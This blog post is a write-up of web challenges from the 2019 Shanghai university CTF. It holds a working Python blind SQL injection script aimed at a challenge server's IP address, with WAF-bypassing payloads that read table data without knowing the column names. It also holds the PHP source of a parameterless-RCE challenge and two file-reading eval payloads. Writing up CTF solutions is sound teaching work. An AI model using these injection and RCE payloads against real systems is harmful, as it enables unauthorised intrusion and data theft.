2019上海大学生网络安全竞赛web题解

前言

web较简单,在这里做下记录

easySql

考点:无列名注入、innob利用、绕waf

import requests
import string
url = "http://47.105.183.208:29898/article.php"
str1 = string.printable
result = ''
# 0'+||+ascii(substring(user()+from+2))=112+||+'0

for i in range(1,100):
    for j in str1:
        #id = "0' || ascii(substring((select group_concat(table_name) from mysql.innodb_table_stats) from %d))=%d || '0"%(i,ord(j))
        #id = "0' || ascii(substring((select group_concat(database_name) from mysql.innodb_table_stats) from %d))=%d || '0"%(i,j)
        #id = "0' || ascii(substring((select group_concat(*) from fl111aa44a99g) from %d))=%d || '0"%(i,ord(j))
        #id = "0' || ascii(substring((select group_concat(database_name) from mysql.innodb_table_stats) from %d))=%d || '0"%(i,ord(j))
        #id = "0' || ascii(substring((select group_concat(e.2) from (select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e join (select 6)f union select * from fl111aa44a99g)e) from %d))=%d || '0"%(i,ord(j))
        #id = "0' || ascii(substring((select group_concat(e.2) from (select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e union select * from fl111aa44a99g)e) from %d))=%d || '0"%(i,ord(j))
        id = f"0' || ascii(substring((select group_concat(e.3) from (select * from (select 1)a join (select 2)b join (select 3)c union/**/select  * from cccttffff.fl111aa44a99g)e) from {i}))={ord(j)} || '0"
        #id = f"0' || ascii(substring((Version()) from {i}))={ord(j)} || '0"
        
        param = {
            'id':id
        }
        rep = requests.get(url,params=param)
        #print(rep.text)
        print(param)
        if '23333333' in rep.text:
            result+=j
            print(result)
            break

babyt5

考点:ssrf、gopher写shell

原题:https://www.jianshu.com/p/804d95f6d6fb

1572770331858

decade

考点:无参数rce

环境:php5、debian

<?php
highlight_file(__FILE__);
$code = $_GET['code'];
if (!empty($code)) {
        if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
            if (preg_match('/readfile|if|time|local|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
                    echo 'bye~';
                } else {
                    var_dump($code);
                    eval($code);
                }
            }
        else {
            echo "No way!!!";
        }
}else {
        echo "No way!!!";
    }

需要先构造出能够切换目录的符号,如“/” "."

1572770778152

file函数替代readfile

payload:

die(next(file(end(scandir(chr(ord(strrev(crypt(serialize(array(chdir(next(scandir(next(scandir(chr(ord(strrev(crypt(serialize(array())))))))))))))))))))));

payload:

echo(implode(file(end(scandir(chr(ceil(sinh(cosh(tan(ceil(sinh(sinh(cosh(ord(phpversion(chdir(next(scandir(next(scandir(chr(ceil(sinh(cosh(tan(floor(abs(tan(cosh(floor(phpversion())))))))))))))))))))))))))))))));

lol2

未解决

CTF

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!